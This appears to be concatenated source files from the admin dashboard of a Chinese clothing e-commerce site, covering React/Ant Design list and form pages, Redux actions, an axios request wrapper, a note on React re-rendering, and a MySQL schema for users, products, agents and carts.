<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
columns={logsColumns}
dataSource={records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: total, ...pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_PRODUCT_TYPE_LIST = 'GET_PRODUCT_TYPE_LIST';
/**
 * Thunk: fetch the product-type list; an empty object is dispatched on
 * failure so the store always holds a defined value.
 * @param params query parameters forwarded to the API
 */
export function getProductTypeList(params) {
  return async (dispatch) => {
    const response = await get(API.getProductTypeList, params);
    const succeeded = response && response.status === 200;
    dispatch({
      type: GET_PRODUCT_TYPE_LIST,
      data: succeeded ? response.data : {}
    });
  }
}
/** Create a product type; resolves with the response payload on HTTP 200, otherwise undefined. */
export async function postProductType(params) {
  const response = await post(API.postProductType, params);
  if (!response || response.status !== 200) {
    return undefined;
  }
  return response.data;
}
/** Update a product type; resolves with the response payload on HTTP 200, otherwise undefined. */
export async function putProductType(params) {
  const response = await put(API.putProductType, params);
  if (!response || response.status !== 200) {
    return undefined;
  }
  return response.data;
}
/** Fetch a product type by id ({id} placeholder substituted). */
export async function getProductTypeById(id) {
  const url = API.getProductTypeById.replace(/{id}/, id);
  const response = await get(url);
  // NOTE: this endpoint nests the payload one level deeper (data.data)
  // than the sibling helpers in this module.
  return response && response.status === 200 ? response.data.data : undefined;
}
/** Fetch dictionary entries under the given label ({label} placeholder substituted). */
export async function getSystemDictByLabel(label) {
  const url = API.getSystemDictByLabel.replace(/{label}/, label);
  const response = await get(url);
  return response && response.status === 200 ? response.data : undefined;
}
/** Fetch the product types matching the query params. */
export async function getProductTypes(params) {
  const response = await get(API.getProductTypes, params);
  return response && response.status === 200 ? response.data : undefined;
}
<file_sep>import React from 'react';
import { Drawer, Form, Button, Input, message } from 'antd';
import { formItemLayout5 } from '../../utils/constant';
import Uploader from '../../component/Uploader';
const FormItem = Form.Item;
const { TextArea } = Input;
@Form.create()
export default class AddItem extends React.Component {
state = {
loading: false,
};
handleSubmit = () => {
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { image, ...params } = values;
const imageUrl = image[0];
const { level, title } = this.props;
this.setState({ loading: true });
const result = await this.props.handleSubmit({ ...params, level, image: imageUrl });
this.setState({ loading: false });
if (result.code === 0) {
this.onClose();
message.success(`${title}成功`);
}
}
});
}
onClose = () => {
this.props.onClose();
this.props.form.resetFields();
}
render() {
const { getFieldDecorator } = this.props.form;
const { detail = {}, actionType, title } = this.props;
return (
<Drawer
title={title}
width={600}
placement="right"
onClose={this.onClose}
visible={this.props.visible}
>
<Form>
<FormItem {...formItemLayout5} label="父编码">
{getFieldDecorator('parentLabel', {
initialValue: this.props.parentLabel,
rules: [{
required: true, message: '请输入字典父编码',
}],
})(
<Input disabled placeholder="请输入字典父编码" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="值">
{getFieldDecorator('value', {
initialValue: detail.value,
rules: [{
required: true, message: '请输入字典值',
}],
})(
<Input placeholder="请输入字典值" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="字典编码">
{getFieldDecorator('label', {
initialValue: detail.label,
rules: [{
required: true, message: '请输入字典编码',
}],
})(
<Input placeholder="请输入字典编码" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="字典名称">
{getFieldDecorator('description', {
initialValue: detail.description,
rules: [{
required: true, message: '请输入字典名称',
}],
})(
<Input placeholder="请输入字典名称" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="顺序">
{getFieldDecorator('sort', {
initialValue: detail.sort,
rules: [{
required: true, message: '请输入字典顺序',
}],
})(
<Input placeholder="请输入字典顺序" />
)}
</FormItem>
<FormItem {...formItemLayout5} label="分类图片">
{getFieldDecorator('image', {
initialValue: detail.image ? [detail.image] : [],
rules: [{
required: true, message: '请添加分类图片',
}],
})(
<Uploader type="product_type" max={1} />
)}
</FormItem>
<FormItem {...formItemLayout5} label="备注">
{getFieldDecorator('remarks', {
initialValue: detail.remarks,
})(
<TextArea rows={4} placeholder="请输入字典备注" />
)}
</FormItem>
<FormItem {...formItemLayout5} label=" " colon={false}>
{actionType !== 'show' && <Button style={{ marginRight: 8 }} onClick={this.handleSubmit} type="primary">提交</Button>}
<Button onClick={this.onClose}>取消</Button>
</FormItem>
</Form>
</Drawer>
);
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Popconfirm } from 'antd';
import listColumns from './columns/list';
import { formItemLayout, showTotal, SKY_TYPE } from '../../utils/constant';
import { getSkylightList, deleteSkylight } from '../../action/skylight';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ skylight }) => ({
skylightList: skylight.skylightList
}), {
getSkylightList
})
@Form.create()
export default class SkylightList extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
...listColumns,
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => (
<div>
<Link to={`/skylight/detail/${record.id}`}>查看</Link>
<Divider type="vertical" />
<Link to={`/skylight/edit/${record.id}`}>编辑</Link>
<Divider type="vertical" />
<Popconfirm
placement="topLeft"
title={`请确定是否删除此天窗?`}
onConfirm={() => this.deleteSkylight(record.id)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">删除</a>
</Popconfirm>
</div>
)
},
];
}
state = {
selectedRowKeys: [],
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
loading: false,
};
componentDidMount() {
this.getSkylightList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
getSkylightList = (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getSkylightList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
deleteSkylight = async (id) => {
const result = await deleteSkylight(id);
if (result && result.code === 0) {
message.success(`删除ID为${id}的天窗成功`);
const pager = { ...this.state.pagination };
this.getSkylightList({
limit: pager.pageSize,
page: pager.current,
});
} else {
message.error('删除天窗失败,请稍后重试');
}
}
handleSubmit = (e) => {
e.preventDefault();
this.getSkylightList();
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getSkylightList({
limit: pagination.pageSize,
page: pagination.current,
});
}
render() {
const { form: { getFieldDecorator }, skylightList } = this.props;
const { selectedRowKeys, loading } = this.state;
const rowSelection = {
selectedRowKeys,
onChange: this.onSelectChange,
}
return (
<div className="page-list product-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="天窗标题">
{getFieldDecorator('skyTitle')(
<Input placeholder="请输入天窗标题" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="天窗类型">
{getFieldDecorator('skyType')(
<Select allowClear placeholder="请选择天窗类型">
{Object.keys(SKY_TYPE).map(item => (
<Option key={item} value={item}>{SKY_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="创建起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
rowSelection={rowSelection}
columns={this.columns}
dataSource={skylightList.records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: skylightList.total, ...this.state.pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import API from '../utils/api';
import { get, post, put } from '../utils/request';
export const GET_PRODUCT_LIST = 'GET_PRODUCT_LIST';
export const GET_PRODUCT_BYID = 'GET_PRODUCT_BYID';
/**
 * Thunk: fetch the product list, store it, and also resolve with the
 * payload so callers can use the result directly.
 * @param params query parameters forwarded to the API
 */
export function getProductList(params) {
  return async (dispatch) => {
    const response = await get(API.productList, params);
    if (!response || response.status !== 200) {
      return undefined;
    }
    dispatch({ type: GET_PRODUCT_LIST, data: response.data });
    return response.data;
  }
}
/**
 * Thunk: fetch a single product's detail by id, store it, and resolve
 * with the detail object (the payload is nested under data.data).
 */
export function getProductById(id) {
  return async (dispatch) => {
    const response = await get(`${API.getProductById}/${id}`);
    if (!response || response.status !== 200) {
      return undefined;
    }
    const detail = response.data.data;
    dispatch({ type: GET_PRODUCT_BYID, data: detail });
    return detail;
  }
}
/** Create a product; resolves with the response payload on HTTP 200, otherwise undefined. */
export async function addProduct(params) {
  const response = await post(API.addProduct, params);
  return response && response.status === 200 ? response.data : undefined;
}
/** Update a product; resolves with the response payload on HTTP 200, otherwise undefined. */
export async function updateProduct(params) {
  const response = await put(API.updateProduct, params);
  return response && response.status === 200 ? response.data : undefined;
}
/** Batch-publish (上架) products. */
export async function batchUpProduct(params) {
  const response = await post(API.batchUpProduct, params);
  return response && response.status === 200 ? response.data : undefined;
}
/** Batch-unpublish (下架) products. */
export async function batchDownProduct(params) {
  const response = await post(API.batchDownProduct, params);
  return response && response.status === 200 ? response.data : undefined;
}
/** Create a batch record. */
export async function addBatch(params) {
  const response = await post(API.addBatch, params);
  return response && response.status === 200 ? response.data : undefined;
}
/** Fetch a product code; the route's {id}/{sn} placeholder pair is substituted. */
export async function getProductCode(id, sn) {
  const url = API.getProductCode.replace(/{id}\/{sn}/, `${id}/${sn}`);
  const response = await get(url);
  return response && response.status === 200 ? response.data : undefined;
}
<file_sep>## 父组件改变引起子组件改变
在组件中,如果props和state改变,会引起当前组件的render的重新渲染,那么父组件的子组件会产生什么变化呢
### 父组件的state和props改变引起普通子组件改变
> 子组件是继承Component类形成的
 如果子组件是继承类Component的一定会随着父组件的render改变发生重新render的
```
export default class Test extends React.PureComponent {
state = {
value: ''
}
handleChange = (e) => {
this.setState({ value: e.target.value })
}
render() {
console.log(this.state.value);
return (
<div>
<input onChange={this.handleChange} />
<Item />
</div>
)
}
}
class Item extends React.Component {
render() {
console.log('child render')
return (
<div>item</div>
)
}
}
```
### 父组件的state和props改变引起纯子组件改变
> 子组件是继承PureComponent类或纯函数形成的
 1. 如果子组件和父组件不存在数据传递关系,或传递的数据没有发生改变,那么父组件的render渲染不会对子组件造成影响
 2. 如果子组件的数据由父组件传递,且传递的数据在父组件发生改变,那么子组件render一定随着父组件重新渲染
```
export default class Test extends React.PureComponent {
state = {
value: '',
test: 'test'
}
handleChange = (e) => {
this.setState({ value: e.target.value })
}
render() {
console.log(this.state.value);
return (
<div>
<input onChange={this.handleChange} />
<Item value={this.state.value} />
</div>
)
}
}
class Item extends React.PureComponent {
componentDidMount() {
console.log('child mount did')
}
render() {
console.log('child render')
return (
<div>{this.props.value}</div>
)
}
}
```
### 组件和react-router一起使用
 1. 父组件没有向路由组件传递数据时,路由数据不会重新渲染
 2. 父组件向路由组件传递数据时,路由组件可能会引起一些问题
如果只传入一个组件时,可以使用Router的component属性,但是你要通过props传递数据给路由子组件时,就不能用component属性了,因为你构建一个新的组件,这就导致组件变成卸载和安装而不是更新了
eg:
```<Route component={() => <Item value={this.state.value} />} path={`/test/list/props-v-state`} />```
官方推荐使用render或children属性进行组件传递,就不会造成上面问题,也就不会遇见很奇怪的路由组件产生多次componentDidMount的情况
```<Route render={() => <Item value={this.state.value} />} path={`/test/list/props-v-state`} />```
<file_sep>import React, { Fragment } from 'react';
import { connect } from 'react-redux';
import { Route, Redirect } from 'react-router-dom';
import { Spin } from 'antd';
import { authCheck } from '../../action/auth';
@connect(({ auth }) => ({
authStatus: auth.authStatus
}), {
authCheck
})
export default class AuthRoute extends React.PureComponent {
state = {
hasAuth: false,
auth: false,
}
async componentDidMount() {
await this.props.authCheck();
const { authStatus } = this.props;
if (authStatus) {
this.setState({ hasAuth: true, auth: true });
} else {
this.setState({ hasAuth: true, auth: false });
}
}
render() {
const { Layout, ...rest } = this.props;
return this.state.hasAuth ? (
<Fragment>
{
this.state.auth ? (
<Route {...rest} render={(props) => <Layout {...props} />}/>
) : (
<Redirect to={{ pathname: '/login',state: { from: rest.location } }}
/>
)
}
</Fragment>
) : (
<div style={{ width: '100%', height: '100%',margin: 'auto', paddingTop: 50, textAlign: 'center' }}>
<Spin />
</div>
)
}
}
<file_sep>import { formatDateSecond } from '../../../utils/utils';
import { nullString, AGENT_TYPE, AGENT_STATUS } from '../../../utils/constant';
// Ant Design Table column definitions for the agent (代理商) list page.
// Render helpers map coded values to display labels, falling back to
// nullString when the value is missing or unmapped.
const columns = [
  {
    title: '代理商编号',
    dataIndex: 'sn',
    key: 'sn',
    align: 'center',
  },
  {
    title: '代理商名称',
    dataIndex: 'name',
    key: 'name',
    align: 'center',
  },
  {
    title: '代理商类型',
    dataIndex: 'type',
    key: 'type',
    align: 'center',
    // Coded type -> display label via the AGENT_TYPE lookup table.
    render: (text) => AGENT_TYPE[text] || nullString
  },
  {
    title: '返点率',
    dataIndex: 'diPer',
    key: 'diPer',
    align: 'center',
  },
  {
    title: '代理商状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
    // Coded status -> display label via the AGENT_STATUS lookup table.
    render: (text) => AGENT_STATUS[text] || nullString
  },
  {
    title: '创建时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
    // Format the timestamp for display; placeholder when absent.
    render: (text) => text ? formatDateSecond(text) : nullString
  },
];
export default columns;
<file_sep>import axios from 'axios';
import { message } from 'antd';
import qs from 'qs';
import { store } from '../index';
import { authUserExpire } from '../action/auth';
/**
 * 封装get方法
 * @param url
 * @param params
 * @returns {Promise}
 */
// GET request wrapper: attaches the stored auth token (falling back to the
// public basic-auth client credential), resolves with the axios response,
// or undefined after reporting the error. 401 triggers the auth-expired flow.
export async function get(url, params = {}) {
  try {
    const result = await axios({
      method: 'GET',
      headers: { 'Authorization': localStorage.getItem('Authorization') || 'Basic cGlnOnBpZw==' },
      params,
      url
    });
    return result;
  } catch (error) {
    if (error.response) {
      if (error.response.status === 401) {
        message.error('登录有效期失效,请重新登录');
        store.dispatch(authUserExpire());
      } else {
        message.error(error.response.statusText);
      }
    } else {
      // BUG FIX: antd's message.error(content, duration) treats the second
      // argument as a display duration, so passing the error object there
      // dropped it; interpolate the message into the content instead.
      message.error(`Error: ${error.message}`);
    }
  }
}
/**
* 封装post请求
* @param url
* @param data
* @returns {Promise}
*/
// POST request wrapper (JSON body): attaches the stored auth token,
// resolves with the axios response, or undefined after reporting the error.
export async function post(url, data = {}) {
  try {
    const result = await axios({
      method: 'POST',
      headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
      data: data,
      url
    });
    return result;
  } catch (error) {
    if (error.response) {
      if (error.response.status === 401) {
        message.error('登录有效期失效,请重新登录');
        store.dispatch(authUserExpire());
      } else {
        // Consistency fix: surface non-401 HTTP errors to the user, matching
        // the behaviour of get(); previously they were silently swallowed.
        message.error(error.response.statusText);
      }
    } else {
      // BUG FIX: message.error(content, duration) — the error object was
      // being passed as the duration and never shown.
      message.error(`Error: ${error.message}`);
    }
  }
}
// Login request: always uses the public basic-auth client credential and a
// form-encoded body; on success persists "<token_type> <access_token>" to
// localStorage for subsequent authenticated requests.
export async function requestLogin(url, data = {}) {
  try {
    const result = await axios({
      method: 'POST',
      headers: { 'Authorization': 'Basic cGlnOnBpZw==' },
      data: qs.stringify(data),
      url
    });
    if (result.data) {
      localStorage.setItem('Authorization', `${result.data.token_type} ${result.data.access_token}`);
    }
    return result;
  } catch (error) {
    if (error.response) {
      if (error.response.status === 401) {
        message.error('登录有效期失效,请重新登录');
        store.dispatch(authUserExpire());
      } else {
        message.error(error.response.data.error_description);
      }
    } else {
      // BUG FIX: message.error(content, duration) — the error object was
      // being passed as the duration and never shown.
      message.error(`Error: ${error.message}`);
    }
  }
}
/**
 * 封装delete请求
* @param url
* @param data
* @returns {Promise}
*/
// DELETE request wrapper (JSON body): attaches the stored auth token,
// resolves with the axios response, or undefined after reporting the error.
export async function deleted(url, data = {}) {
  try {
    const result = await axios({
      method: 'DELETE',
      headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
      data: data,
      url
    });
    return result;
  } catch (error) {
    if (error.response) {
      if (error.response.status === 401) {
        message.error('登录有效期失效,请重新登录');
        store.dispatch(authUserExpire());
      } else {
        // Consistency fix: surface non-401 HTTP errors, matching get().
        message.error(error.response.statusText);
      }
    } else {
      // BUG FIX: message.error(content, duration) — the error object was
      // being passed as the duration and never shown.
      message.error(`Error: ${error.message}`);
    }
  }
}
/**
* 封装put请求
* @param url
* @param data
* @returns {Promise}
*/
// PUT request wrapper (JSON body): attaches the stored auth token,
// resolves with the axios response, or undefined after reporting the error.
export async function put(url, data = {}) {
  try {
    const result = await axios({
      method: 'PUT',
      headers: { 'Authorization': localStorage.getItem('Authorization'), 'Content-Type': 'application/json;charset=UTF-8' },
      data: data,
      url
    });
    return result;
  } catch (error) {
    if (error.response) {
      if (error.response.status === 401) {
        message.error('登录有效期失效,请重新登录');
        store.dispatch(authUserExpire());
      } else {
        // Consistency fix: surface non-401 HTTP errors, matching get().
        message.error(error.response.statusText);
      }
    } else {
      // BUG FIX: message.error(content, duration) — the error object was
      // being passed as the duration and never shown.
      message.error(`Error: ${error.message}`);
    }
  }
}
<file_sep>/*
SQLyog Ultimate v11.22 (64 bit)
MySQL - 5.7.22 : Database - cloth_mall
*********************************************************************
*/
/*!40101 SET NAMES utf8 */;
/*!40101 SET SQL_MODE=''*/;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
CREATE DATABASE /*!32312 IF NOT EXISTS*/`cloth_mall` /*!40100 DEFAULT CHARACTER SET utf8mb4 */;
USE `cloth_mall`;
/*Table structure for table `t_user_admin` */
DROP TABLE IF EXISTS `t_user_admin`;
CREATE TABLE `t_user_admin` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '主键',
`username` varchar(45) NOT NULL COMMENT '用户名',
`password` varchar(128) NOT NULL COMMENT '密码,<PASSWORD>',
`type` int(11) NOT NULL DEFAULT '0' COMMENT '用户类型:0-内部用户',
`mobile` varchar(45) DEFAULT NULL COMMENT '手机号',
`email` varchar(45) DEFAULT NULL COMMENT '邮箱',
`url` varchar(120) DEFAULT NULL COMMENT '头像',
`status` tinyint(1) NOT NULL COMMENT '状态:0-不可用,1-可用',
`creator` varchar(64) DEFAULT NULL COMMENT '创建人',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`editer` varchar(64) DEFAULT NULL COMMENT '修改人',
`update_time` datetime DEFAULT NULL COMMENT '修改时间',
PRIMARY KEY (`id`),
UNIQUE KEY `username_key` (`username`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='管理员表';
/*Table structure for table `t_user_account` */
DROP TABLE IF EXISTS `t_user_account`;
CREATE TABLE `t_user_account` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`password` varchar(70) DEFAULT NULL COMMENT '密码,<PASSWORD>',
`phone_number` varchar(20) DEFAULT '' COMMENT '手机号码,登录时用手机号码+密码登录',
`name` varchar(20) DEFAULT NULL COMMENT '昵称',
`email` varchar(50) DEFAULT NULL COMMENT '邮箱',
`url` varchar(200) DEFAULT NULL COMMENT '头像',
`regist_channel` varchar(32) DEFAULT NULL COMMENT '用户来源:0-公众号,1-小程序,2-App,3-网站',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`latest_login_time` datetime DEFAULT NULL COMMENT '最近登录时间',
`status` varchar(2) DEFAULT NULL COMMENT '状态:0正常 1封号',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='用户表';
/*Table structure for table `t_user_account_receive_address` */
DROP TABLE IF EXISTS `t_user_account_receive_address`;
CREATE TABLE `t_user_account_receive_address` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`account_id` bigint(32) DEFAULT NULL COMMENT '地址对应用户ID',
`consignee_name` varchar(20) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '收货人姓名',
`phone_number` varchar(20) COLLATE utf8mb4_bin NOT NULL COMMENT '手机号码',
`province` bigint(32) DEFAULT NULL COMMENT '省',
`province_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '省份名称',
`city` bigint(32) DEFAULT NULL COMMENT '市',
`city_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '城市名称',
`district` bigint(32) NOT NULL COMMENT '县/区',
`district_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '县/区',
`address` varchar(50) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '详细地址',
`full_address` varchar(500) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '全地址',
`is_defult` varchar(5) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '是否默认地址,0-默认地址,1-非默认地址',
`create_time` datetime NOT NULL COMMENT '创建时间',
`update_time` datetime NOT NULL COMMENT '修改时间',
`is_deleted` smallint(2) DEFAULT '0' COMMENT '标识是否删除:0-未删除,1-删除',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin COMMENT='用户收货地址表';
/*Table structure for table `t_dictionary` */
DROP TABLE IF EXISTS `t_dictionary`;
CREATE TABLE `t_dictionary` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`type` varchar(30) NOT NULL COMMENT '类型',
`code` varchar(50) NOT NULL COMMENT '字典编码',
`value` varchar(11) NOT NULL COMMENT '值',
`name` varchar(50) NOT NULL COMMENT '名称',
`parentcode` varchar(50) NOT NULL COMMENT '父编码',
`gradation` int(3) DEFAULT NULL COMMENT '顺序',
`level` int(3) DEFAULT NULL COMMENT '层级',
`remark` varchar(150) DEFAULT NULL COMMENT '备注',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='数据字典表';
/*Table structure for table `t_account_log` */
DROP TABLE IF EXISTS `t_account_log`;
CREATE TABLE `t_account_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`account_id` bigint(20) unsigned DEFAULT NULL COMMENT '用户Id',
`event_type` varchar(20) DEFAULT NULL COMMENT '事件类型:0-登录,1-Logout',
`app` varchar(30) DEFAULT NULL COMMENT '应用',
`login_IP_Address` varchar(100) DEFAULT NULL COMMENT '登录IP地址',
`location` varchar(100) DEFAULT NULL COMMENT '事件发生位置',
`timestamp` datetime DEFAULT NULL COMMENT '时间戳',
`remark` varchar(500) DEFAULT NULL COMMENT '备注',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='用户日志';
/*Table structure for table `t_product` */
DROP TABLE IF EXISTS `t_product`;
CREATE TABLE `t_product` (
  `id` bigint(32) NOT NULL COMMENT '产品编号',
  `same_style_num` varchar(32) NOT NULL COMMENT '产品货号',/*用户自定义,最后两位同款颜色序号,其余为款式编号*/
  /* BUG FIX: this column was quoted with full-width quotes (‘…’), which is a
     MySQL syntax error — identifiers must use backticks. */
  `product_inventory` int COMMENT '库存量',
  `factory_num` varchar(32) DEFAULT NULL COMMENT '工厂代码',
  `name` varchar(75) NOT NULL COMMENT '产品名称',
  `main_picture` varchar(120) DEFAULT NULL COMMENT '主图',
  `detail_picture` text COMMENT '详情图,最多不超过五张',
  `detail` varchar(5000) DEFAULT NULL COMMENT '商品详情',
  `colour` varchar(260) DEFAULT NULL COMMENT '商品颜色',
  `product_category` varchar(50) DEFAULT NULL COMMENT '产品大类', /*有什么*/
  `product_subcategory` varchar(50) DEFAULT NULL COMMENT '产品子类',/*有什么*/
  `status` varchar(30) DEFAULT NULL COMMENT '产品状态:0-待上架,1-上架,2-下架',
  `create_time` datetime DEFAULT NULL COMMENT '创建时间',
  `update_time` datetime DEFAULT NULL COMMENT '更新时间',
  `creator` varchar(64) DEFAULT NULL COMMENT '创建者',
  `editer` varchar(64) DEFAULT NULL COMMENT '编辑者',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='产品表';
/*Table structure for table `t_product_price` */
DROP TABLE IF EXISTS `t_product_price`;
CREATE TABLE `t_product_price` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`product_id` bigint(32) NOT NULL COMMENT '产品ID',
`interval` varchar(50) DEFAULT NULL COMMENT '区间',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`price` float(10,2) DEFAULT NULL COMMENT '价格',
`original_price` float(10,2) DEFAULT NULL COMMENT '划线价',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='产品价格表';
/*Table structure for table `t_oauth_client` */
/*Table structure for table `t_agent` */
DROP TABLE IF EXISTS `t_agent`;
CREATE TABLE `t_agent` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`account_id` bigint(32) NOT NULL COMMENT '用户ID',
`type` varchar(20) NOT NULL COMMENT '代理商类型,0-门店代理商,1-个人代理商',
`di_per` double DEFAULT NULL COMMENT '分成提点',
`name` varchar(30) DEFAULT NULL COMMENT '代理商名称',
`url` varchar(120) DEFAULT NULL COMMENT '代理商门店图片地址',
`detail` text COMMENT '门店详情',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '修改者',
`update_time` datetime DEFAULT NULL COMMENT '修改时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='代理商表';
/*Table structure for table `t_agent_product` */
DROP TABLE IF EXISTS `t_agent_product`;
CREATE TABLE `t_agent_product` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`product_id` bigint(32) DEFAULT NULL COMMENT '产品ID',
`sign` varchar(30) DEFAULT NULL COMMENT '加密后的码值',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='代理商产品关联表';
/*Table structure for table `t_shop_car` */
DROP TABLE IF EXISTS `t_shop_car`;
CREATE TABLE `t_shop_car` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`product_id` bigint(32) NOT NULL COMMENT '产品ID',
`account_id` bigint(32) NOT NULL COMMENT '用户ID',
`amount` float DEFAULT NULL COMMENT '数量',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='购物车';
/*Table structure for table `t_oauth_client` */
DROP TABLE IF EXISTS `t_oauth_client`;
CREATE TABLE `t_oauth_client` (
`client_id` varchar(128) NOT NULL,
`secret` varchar(128) DEFAULT NULL,
`created_time` datetime DEFAULT NULL,
`modified_time` datetime DEFAULT NULL,
`grant_types` varchar(125) DEFAULT NULL,
`refresh_token_validity_seconds` int(11) DEFAULT NULL,
PRIMARY KEY (`client_id`),
UNIQUE KEY `client_id_UNIQUE` (`client_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*Table structure for table `t_oauth_refresh_token` */
DROP TABLE IF EXISTS `t_oauth_refresh_token`;
